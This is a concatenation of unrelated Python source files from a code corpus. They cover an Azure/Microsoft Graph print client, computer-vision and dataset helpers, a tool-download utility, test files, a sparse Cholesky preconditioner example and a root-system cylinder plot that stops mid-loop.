:type body: ~devices_cloud_print.models.MicrosoftGraphPrinterShare
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_shares.metadata['url'] # type: ignore
path_format_arguments = {
'printerShare-id': self._serialize.url("printer_share_id", printer_share_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrinterShare')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
update_shares.metadata = {'url': '/print/shares/{printerShare-id}'} # type: ignore
def delete_shares(
self,
printer_share_id, # type: str
if_match=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
"""Delete navigation property shares for print.
Delete navigation property shares for print.
:param printer_share_id: key: id of printerShare.
:type printer_share_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_shares.metadata['url'] # type: ignore
path_format_arguments = {
'printerShare-id': self._serialize.url("printer_share_id", printer_share_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_shares.metadata = {'url': '/print/shares/{printerShare-id}'} # type: ignore
def list_task_definitions(
self,
orderby=None, # type: Optional[List[Union[str, "models.Enum98"]]]
select=None, # type: Optional[List[Union[str, "models.Enum99"]]]
expand=None, # type: Optional[List[Union[str, "models.Enum100"]]]
**kwargs # type: Any
):
# type: (...) -> Iterable["models.CollectionOfPrintTaskDefinition"]
"""Get taskDefinitions from print.
Get taskDefinitions from print.
:param orderby: Order items by property values.
:type orderby: list[str or ~devices_cloud_print.models.Enum98]
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum99]
:param expand: Expand related entities.
:type expand: list[str or ~devices_cloud_print.models.Enum100]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either CollectionOfPrintTaskDefinition or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~devices_cloud_print.models.CollectionOfPrintTaskDefinition]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.CollectionOfPrintTaskDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_task_definitions.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('CollectionOfPrintTaskDefinition', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.OdataError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_task_definitions.metadata = {'url': '/print/taskDefinitions'} # type: ignore
def create_task_definitions(
self,
body, # type: "models.MicrosoftGraphPrintTaskDefinition"
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrintTaskDefinition"
"""Create new navigation property to taskDefinitions for print.
Create new navigation property to taskDefinitions for print.
:param body: New navigation property.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrintTaskDefinition
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrintTaskDefinition, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrintTaskDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrintTaskDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_task_definitions.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrintTaskDefinition')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrintTaskDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_task_definitions.metadata = {'url': '/print/taskDefinitions'} # type: ignore
def get_task_definitions(
self,
print_task_definition_id, # type: str
select=None, # type: Optional[List[Union[str, "models.Enum101"]]]
expand=None, # type: Optional[List[Union[str, "models.Enum102"]]]
**kwargs # type: Any
):
# type: (...) -> "models.MicrosoftGraphPrintTaskDefinition"
"""Get taskDefinitions from print.
Get taskDefinitions from print.
:param print_task_definition_id: key: id of printTaskDefinition.
:type print_task_definition_id: str
:param select: Select properties to be returned.
:type select: list[str or ~devices_cloud_print.models.Enum101]
:param expand: Expand related entities.
:type expand: list[str or ~devices_cloud_print.models.Enum102]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MicrosoftGraphPrintTaskDefinition, or the result of cls(response)
:rtype: ~devices_cloud_print.models.MicrosoftGraphPrintTaskDefinition
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.MicrosoftGraphPrintTaskDefinition"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_task_definitions.metadata['url'] # type: ignore
path_format_arguments = {
'printTaskDefinition-id': self._serialize.url("print_task_definition_id", print_task_definition_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MicrosoftGraphPrintTaskDefinition', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_task_definitions.metadata = {'url': '/print/taskDefinitions/{printTaskDefinition-id}'} # type: ignore
def update_task_definitions(
self,
print_task_definition_id, # type: str
body, # type: "models.MicrosoftGraphPrintTaskDefinition"
**kwargs # type: Any
):
# type: (...) -> None
"""Update the navigation property taskDefinitions in print.
Update the navigation property taskDefinitions in print.
:param print_task_definition_id: key: id of printTaskDefinition.
:type print_task_definition_id: str
:param body: New navigation property values.
:type body: ~devices_cloud_print.models.MicrosoftGraphPrintTaskDefinition
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_task_definitions.metadata['url'] # type: ignore
path_format_arguments = {
'printTaskDefinition-id': self._serialize.url("print_task_definition_id", print_task_definition_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'MicrosoftGraphPrintTaskDefinition')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
update_task_definitions.metadata = {'url': '/print/taskDefinitions/{printTaskDefinition-id}'} # type: ignore
def delete_task_definitions(
self,
print_task_definition_id, # type: str
if_match=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> None
"""Delete navigation property taskDefinitions for print.
Delete navigation property taskDefinitions for print.
:param print_task_definition_id: key: id of printTaskDefinition.
:type print_task_definition_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_task_definitions.metadata['url'] # type: ignore
path_format_arguments = {
'printTaskDefinition-id': self._serialize.url("print_task_definition_id", print_task_definition_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.OdataError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_task_definitions.metadata = {'url': '/print/taskDefinitions/{printTaskDefinition-id}'} # type: ignore
| StarcoderdataPython |
6663805 | def check_command_succeeded(reply):
"""
Return true if command succeeded, print reason and return false if command
rejected
param reply: BinaryReply
return: boolean
"""
from zaber.serial import BinarySerial, BinaryDevice, BinaryCommand, BinaryReply
import time
if reply.command_number == 255: # 255 is the binary error response code.
print ("Danger! Command rejected. Error code: " + str(reply.data))
return False
else: # Command was accepted
return True
| StarcoderdataPython |
4806084 | <reponame>faderani/mosse-object-tracking
from mosse import mosse
import argparse
parse = argparse.ArgumentParser()
parse.add_argument('--lr', type=float, default=0.125, help='the learning rate')
parse.add_argument('--sigma', type=float, default=100, help='the sigma')
parse.add_argument('--num_pretrain', type=int, default=128, help='the number of pretrain')
parse.add_argument('--rotate', action='store_true', help='if rotate image during pre-training.')
parse.add_argument('--record', action='store_true', help='record the frames')
if __name__ == '__main__':
args = parse.parse_args()
img_path = 'datasets/surfer/'
tracker = mosse(args, img_path)
tracker.start_tracking()
| StarcoderdataPython |
6540116 | <gh_stars>10-100
"""
Monkeypatches ``Project`` model to keep the size to 255 characters up from 63 since RTD 2.8.1.
RTD changed the name / slug length to 63 chars to fit DNS restrictions as they use the project
slug as third level domain (don't ask me why the restricted the name to the same length).
As we only use in a normal path we don't have such restrictions and we have a lot of long names,
we must revert this change.
Plus they changed a field type and we have to make sure our data fits correctly in the new type
* migration projects.0030_change-max-length-project-slug is modified in a noop (code is
commented to clarify the original scope of the migration).
* monkeypatch `Project` to set field length and validator to our length to let things work at
runtime (forms validation etc). monkeypatch has been preferred over changing existing code
to reduce the chances of conflicts.
"""
from django.core import validators
from readthedocs.projects.models import Project
def monkey_patch_project_model():
"""
Revert changes in 8d2ee29de95690a9cd72d4f2a0b4131a44449928.
They changed the original values as any domain part can't be longer than 63 chars
but we don't have this limitation.
"""
fields = ["name", "slug"]
field_length = 255
for field in fields:
fieldobj = Project._meta.get_field(field)
fieldobj.max_length = field_length
for validator in fieldobj.validators:
if isinstance(validator, validators.MaxLengthValidator):
validator.limit_value = field_length
monkey_patch_project_model()
| StarcoderdataPython |
3454348 | from .grad_cam import GradCAM, GradCAMPlusPlus, XGradCAM
from .utils import overlay
| StarcoderdataPython |
1950883 | <filename>plums/plot/engine/utils.py
import PIL.ImageFont
import numpy as np
from plums.commons import Path
def get_text_color(background_color):
"""Select the appropriate text color (black or white) based on the luminance of the background color.
Arguments:
background_color (tuple): The record color (RGB or RGBA format).
Returns:
tuple: The chosen text color (black or white).
"""
# Counting the perceptive luminance - human eye favors green color...
luminance = (0.299 * background_color[0] + 0.587 * background_color[1] + 0.114 * background_color[2]) / 255.
# Set text color to white on "dark" backgrounds and dark color on "light" background
if luminance <= 0.5:
return 255, 255, 255
return 0, 0, 0
def get_outline_color(background_color):
"""Select the appropriate text color (black or white) based on the luminance of the background color.
Arguments:
background_color (tuple): The record color (RGB or RGBA format).
Returns:
tuple: The chosen text color (black or white).
"""
# Counting the perceptive luminance - human eye favors green color...
luminance = (0.299 * background_color[0] + 0.587 * background_color[1] + 0.114 * background_color[2]) / 255.
# Set text color to white on "dark" backgrounds and dark color on "light" background
if luminance <= 0.5:
return 150, 150, 150
return 100, 100, 100
def get_default_font(text_size):
"""Get a default font to render targets with text.
Args:
text_size (int): text size in pixels
Returns:
:class:`~PIL.ImageFont.FreeTypeFont`
"""
assert isinstance(text_size, int) and text_size > 0, "Text size should be positive integer"
return PIL.ImageFont.truetype(font=str(Path(__file__)[:-1] / "fonts" / "arial.ttf"), size=text_size)
def dict_equal(dictionary, other_dictionary):
"""Compare two dict with :class:`numpy.ndarray` value handling.
Comparison is made in two parts:
* We first check that both dict have the same keys.
* If they do we then compare each value pair and lazily return ``False`` if any comparison fails.
Note:
Value comparison implicitly delegates to the :meth:`__eq__` method of singular elements and avoids explicit
type-check. Although this is somewhat slower as it involves potentially long element-wise equality checks,
it allows for duck-typing and rich type handling by particular classes.
Args:
dictionary (dict): A :class:`dict` to compare with another.
other_dictionary (dict): A :class:`dict` to compare with another.
Returns:
bool: :any:`True` if the two dict are equal in keys and content.
"""
if set(dictionary.keys()) == set(other_dictionary.keys()):
for key, value in dictionary.items():
if isinstance(value, np.ndarray) or isinstance(other_dictionary[key], np.ndarray):
# If an ndarray we need explicitly go through np.all() to compare
if not np.all(value == other_dictionary[key]):
# If not the same lazily exit now
return False
else:
# Otherwise we delegate to cmp()
if not value == other_dictionary[key]:
# If not the same lazily exit now
return False
# All equal, return True
return True
# Not even the same keys, return False
return False
| StarcoderdataPython |
3204220 |
def test_povgen():
import difflib
import urllib
import subprocess
import os
proteus_path = os.path.dirname(
os.path.dirname(
os.path.dirname(
os.path.dirname(os.path.abspath(__file__)))))
povgen_path = os.path.join(proteus_path,'scripts','povgen.py')
urllib.urlretrieve(
'https://dl.dropboxusercontent.com/u/26353144/floating_bar0.h5',
'floating_bar0.h5')
subprocess.check_call([povgen_path,
'floating_bar',
'-s',
'3'])
# prefix='phi_0.000000_
povfiles = []
for i in range(3):
filename = 'phi_0.000000_{0:04d}.pov'.format(i)
with open(filename, 'r') as f:
povfiles.append(f.readlines())
urllib.urlretrieve(
'https://dl.dropboxusercontent.com/u/26353144/phi_0.000000_000.tgz',
'phi_0.000000_000.tgz')
subprocess.check_call(['tar', 'xzf', 'phi_0.000000_000.tgz'])
saved_povfiles = []
for i in range(3):
filename = 'phi_0.000000_{0:04d}.pov'.format(i)
with open(filename, 'r') as f:
saved_povfiles.append(f.readlines())
assert saved_povfiles[i] == povfiles[i], \
''.join(list(difflib.unified_diff(saved_povfiles[i],
povfiles[i],
"archived",
"test")))
os.remove('phi_0.000000_000.tgz')
os.remove('floating_bar0.h5')
| StarcoderdataPython |
8033216 | <reponame>MohammedAljahdali/shrinkbench<gh_stars>100-1000
import pathlib
from torch.utils.data import Dataset
from torchvision.datasets import ImageFolder
# Data is here : http://places2.csail.mit.edu/download.html
# We assume directory structure from
# Small images (256 * 256) with easy directory structure
class Places365(Dataset):
def __init__(self, root, train=True, transform=None, target_transform=None, **kwargs):
root = pathlib.Path(root)
root /= 'places365_standard'
root /= 'train' if train else 'val'
self.data = ImageFolder(root,
transform=transform,
target_transform=target_transform,
**kwargs)
def __len__(self):
return len(self.data)
def __getitem__(self, index):
return self.data[index]
| StarcoderdataPython |
3427470 | """WizardKit: Tool Functions"""
# vim: sts=2 sw=2 ts=2
from datetime import datetime, timedelta
import logging
import pathlib
import platform
import requests
from wk.cfg.main import ARCHIVE_PASSWORD
from wk.cfg.sources import DOWNLOAD_FREQUENCY, SOURCES
from wk.exe import popen_program, run_program
from wk.std import GenericError
# STATIC VARIABLES
ARCH = '64' if platform.architecture()[0] == '64bit' else '32'
LOG = logging.getLogger(__name__)
# "GLOBAL" VARIABLES
CACHED_DIRS = {}
# Functions
def download_file(out_path, source_url, as_new=False, overwrite=False):
"""Download a file using requests, returns pathlib.Path."""
out_path = pathlib.Path(out_path).resolve()
name = out_path.name
download_failed = None
download_msg = f'Downloading {name}...'
if as_new:
out_path = out_path.with_suffix(f'{out_path.suffix}.new')
print(download_msg, end='', flush=True)
# Avoid clobbering
if out_path.exists() and not overwrite:
raise FileExistsError(f'Refusing to clobber {out_path}')
# Create destination directory
out_path.parent.mkdir(parents=True, exist_ok=True)
# Request download
try:
response = requests.get(source_url, stream=True)
except requests.RequestException as _err:
download_failed = _err
else:
if not response.ok:
download_failed = response
# Download failed
if download_failed:
LOG.error('Failed to download file: %s', download_failed)
raise GenericError(f'Failed to download file: {name}')
# Write to file
with open(out_path, 'wb') as _f:
for chunk in response.iter_content(chunk_size=128):
_f.write(chunk)
# Done
print(f'\033[{len(download_msg)}D\033[0K', end='', flush=True)
return out_path
def download_tool(folder, name, suffix=None):
"""Download tool."""
name_arch = f'{name}{ARCH}'
out_path = get_tool_path(folder, name, check=False, suffix=suffix)
up_to_date = False
# Check if tool is up to date
try:
ctime = datetime.fromtimestamp(out_path.stat().st_ctime)
up_to_date = datetime.now() - ctime < timedelta(days=DOWNLOAD_FREQUENCY)
except FileNotFoundError:
# Ignore - we'll download it below
pass
if out_path.exists() and up_to_date:
LOG.info('Skip downloading up-to-date tool: %s', name)
return
# Get ARCH specific URL if available
if name_arch in SOURCES:
source_url = SOURCES[name_arch]
out_path = out_path.with_name(f'{name_arch}{out_path.suffix}')
else:
source_url = SOURCES[name]
# Download
LOG.info('Downloading tool: %s', name)
try:
new_file = download_file(out_path, source_url, as_new=True)
new_file.replace(out_path)
except GenericError:
# Ignore as long as there's still a version present
if not out_path.exists():
raise
def extract_archive(archive, out_path, *args, mode='x', silent=True):
"""Extract an archive to out_path."""
out_path = pathlib.Path(out_path).resolve()
out_path.parent.mkdir(parents=True, exist_ok=True)
cmd = [get_tool_path('7-Zip', '7z'), mode, archive, f'-o{out_path}', *args]
if silent:
cmd.extend(['-bso0', '-bse0', '-bsp0'])
# Extract
run_program(cmd)
def extract_tool(folder):
"""Extract tool."""
extract_archive(
find_kit_dir('.cbin').joinpath(folder).with_suffix('.7z'),
find_kit_dir('.bin').joinpath(folder),
'-aos', f'-p{ARCHIVE_PASSWORD}',
)
def find_kit_dir(name=None):
"""Find folder in kit, returns pathlib.Path.
Search is performed in the script's path and then recursively upwards.
If name is given then search for that instead."""
cur_path = pathlib.Path(__file__).resolve().parent
search = name if name else '.bin'
# Search
if name in CACHED_DIRS:
return CACHED_DIRS[name]
while not cur_path.match(cur_path.anchor):
if cur_path.joinpath(search).exists():
break
cur_path = cur_path.parent
# Check
if cur_path.match(cur_path.anchor):
raise FileNotFoundError(f'Failed to find kit dir, {name=}')
if name:
cur_path = cur_path.joinpath(name)
# Done
CACHED_DIRS[name] = cur_path
return cur_path
def get_tool_path(folder, name, check=True, suffix=None):
"""Get tool path, returns pathlib.Path"""
bin_dir = find_kit_dir('.bin')
if not suffix:
suffix = 'exe'
name_arch = f'{name}{ARCH}'
# "Search"
tool_path = bin_dir.joinpath(f'{folder}/{name_arch}.{suffix}')
if not (tool_path.exists() or name_arch in SOURCES):
# Use "default" path instead
tool_path = tool_path.with_name(f'{name}.{suffix}')
# Missing?
if check and not tool_path.exists():
raise FileNotFoundError(f'Failed to find tool, {folder=}, {name=}')
# Done
return tool_path
def run_tool(
folder, name, *run_args,
cbin=False, cwd=False, download=False, popen=False,
**run_kwargs,
):
"""Run tool from the kit or the Internet, returns proc obj.
proc will be either subprocess.CompletedProcess or subprocess.Popen."""
proc = None
# Extract from .cbin
if cbin:
extract_tool(folder)
# Download tool
if download:
download_tool(folder, name)
# Run
tool_path = get_tool_path(folder, name)
cmd = [tool_path, *run_args]
if cwd:
run_kwargs['cwd'] = tool_path.parent
if popen:
proc = popen_program(cmd, **run_kwargs)
else:
proc = run_program(cmd, check=False, **run_kwargs)
# Done
return proc
if __name__ == '__main__':
print("This file is not meant to be called directly.")
| StarcoderdataPython |
1801221 | import re
import json
from typing import Tuple
MISSING_EMPTY_STR = re.compile(r'''
\s*
(
null
| false
| \-? 0 (\.0+)? ([eE] [\-\+]? [0-9]+)?
| \{ \s* \}
| \[ \s* \]
)
\s*
''', re.VERBOSE)
def test_regex_is_falsey(s: str) -> Tuple[bool, bool]:
"""
post: _[0] != _[1]
raises: json.JSONDecodeError
"""
return (
bool(json.loads(s)),
bool(MISSING_EMPTY_STR.fullmatch(s)),
)
| StarcoderdataPython |
11260743 | <gh_stars>1-10
# run functions for merge
import os
import pytest
from merge_data import load_data, merge_data
from arrest_analysis import model_arrest, load_alldata, select_variables, save_output
@pytest.fixture
def alldata():
datadir = 'data'
demogdata, taskdata = load_data(datadir)
alldata = merge_data(demogdata, taskdata, datadir)
return alldata
def test_analysis(alldata):
resultsdir = 'results'
if not os.path.exists(resultsdir):
os.mkdir(resultsdir)
arrestdata = select_variables(alldata)
log_reg, log_reg_baseline = model_arrest(arrestdata)
assert log_reg is not None
assert log_reg_baseline is not None
save_output(log_reg, log_reg_baseline, resultsdir)
| StarcoderdataPython |
9729019 | <gh_stars>10-100
import sys
sys.path.append('rchol/')
import numpy as np
from scipy.sparse import identity
from numpy.linalg import norm
from rchol import *
from util import *
# Initial problem: 3D-Poisson
n = 20
A = laplace_3d(n) # see ./rchol/util.py
# random RHS
N = A.shape[0]
b = np.random.rand(N)
print("Initial problem:")
# compute preconditioner after reordering (multi thread)
nthreads = 2
G, perm, part = rchol(A, nthreads)
Aperm = A[perm[:, None], perm]
print('fill-in ratio: {:.2}'.format(2*G.nnz/A.nnz))
# solve with PCG
tol = 1e-6
maxit = 200
x, relres, itr = pcg(Aperm, b[perm], tol, maxit, G, G.transpose().tocsr())
print('# CG iterations: {}'.format(itr))
print('Relative residual: {:.2e}\n'.format(relres))
# perturb the original matrix
B = A + 1e-3*identity(N)
print('New problem (same sparsity) ...')
# compute preconditioner with existing permutation/partition
L = rchol(B, nthreads, perm, part)[0]
print('fill-in ratio: {:.2}'.format(2*L.nnz/A.nnz))
# solve the new problem
Bperm = B[perm[:, None], perm]
x, relres, itr = pcg(Bperm, b[perm], tol, maxit, L, L.transpose().tocsr())
print('# CG iterations: {}'.format(itr))
print('Relative residual: {:.2e}\n'.format(relres))
| StarcoderdataPython |
1940300 | #!/usr/bin/ python
# -*- coding: utf-8 -*-
"""
Created on Sun Oct 2 18:33:10 2016
Modified from https://stackoverflow.com/questions/38076682/how-to-add-colors-to-each-individual-face-of-a-cylinder-using-matplotlib
to add "end caps" and to undo fancy coloring.
@author: astrokeat
"""
import numpy as np
from matplotlib import pyplot as plt
from matplotlib import cm
from scipy.linalg import norm
from mpl_toolkits.mplot3d import Axes3D
import pandas as pd
import sys
day_list = []
day = 1
count = 0
X = []
Y = []
Z = []
df1 = pd.read_csv('/home/renato/groimp_efficient/run_1/seg60.txt',
delim_whitespace=True,skiprows=0,header=0)
NumAxe = np.array(df1['NumAxe'].values)
Jour = np.array(df1['Jour'].values)
Diam = np.array(df1['Diam'].values)
x1 = np.array(df1['X1'].values)
y1 = np.array(df1['Y1'].values)
z1 = np.array(df1['Z1'].values)
x2 = np.array(df1['X2'].values)
y2 = np.array(df1['Y2'].values)
z2 = np.array(df1['Z2'].values)
while day <= 30:
print day_list
ax = plt.subplot(111, projection='3d')
day_list.append(day)
#for j in range(len(NumAxe)):
#print NumAxe[i],Jour[i],Diam[i],X1[i], Y1[i], Z1[i],X2[i], Y2[i], Z2[i]
df1 = pd.read_csv('/home/renato/groimp_efficient/plot/run1_root_data/seg%s.txt'%(day),
delim_whitespace=True,skiprows=0,header=0)
#if Jour[j] in day_list:
NumAxe = np.array(df1['NumAxe'].values)
Jour = np.array(df1['Jour'].values)
Diam = np.array(df1['Diam'].values)
x1 = np.array(df1['X1'].values)
y1 = np.array(df1['Y1'].values)
z1 = np.array(df1['Z1'].values)
x2 = np.array(df1['X2'].values)
y2 = np.array(df1['Y2'].values)
z2 = np.array(df1['Z2'].values)
for j in range(len(x1)):
#axis and radius
p0 = np.array([x1[j], y1[j], -z1[j]]) #point at one end
p1 = np.array([x2[j], y2[j], -z2[j]]) #point at other end
R = Diam[j]
#vector in direction of axis
v = p1 - p0
#find magnitude of vector
mag = norm(v)
#unit vector in direction of axis
v = v / mag
#make some vector not in the same direction as v
not_v = np.array([1, 0, 0])
if (v == not_v).all():
not_v = np.array([0, 1, 0])
#make vector perpendicular to v
n1 = np.cross(v, not_v)
#normalize n1
n1 /= norm(n1)
#make unit vector perpendicular to v and n1
n2 = np.cross(v, n1)
#surface ranges over t from 0 to length of axis and 0 to 2*pi
t = np.linspace(0, mag, 2)
theta = np.linspace(0, 2 * np.pi, 100)
rsample = np.linspace(0, R, 2)
#use meshgrid to make 2d arrays
t, theta2 = np.meshgrid(t, theta)
rsample,theta = np.meshgrid(rsample, theta)
#generate coordinates for surface
# "Tube"
#X, Y, Z = [p0[i] + v[i] * t + R * np.sin(theta2) * n1[i] + R * np.cos(theta2) * n2[i] for i in [0, 1, 2]]
X.append(p0[0] + v[0] * t + R * np.sin(theta2) * n1[0] + R * np.cos(theta2) * n2[0])
Y.append(p0[1] + v[1] * t + R * np.sin(theta2) * n1[1] + R * np.cos(theta2) * n2[1])
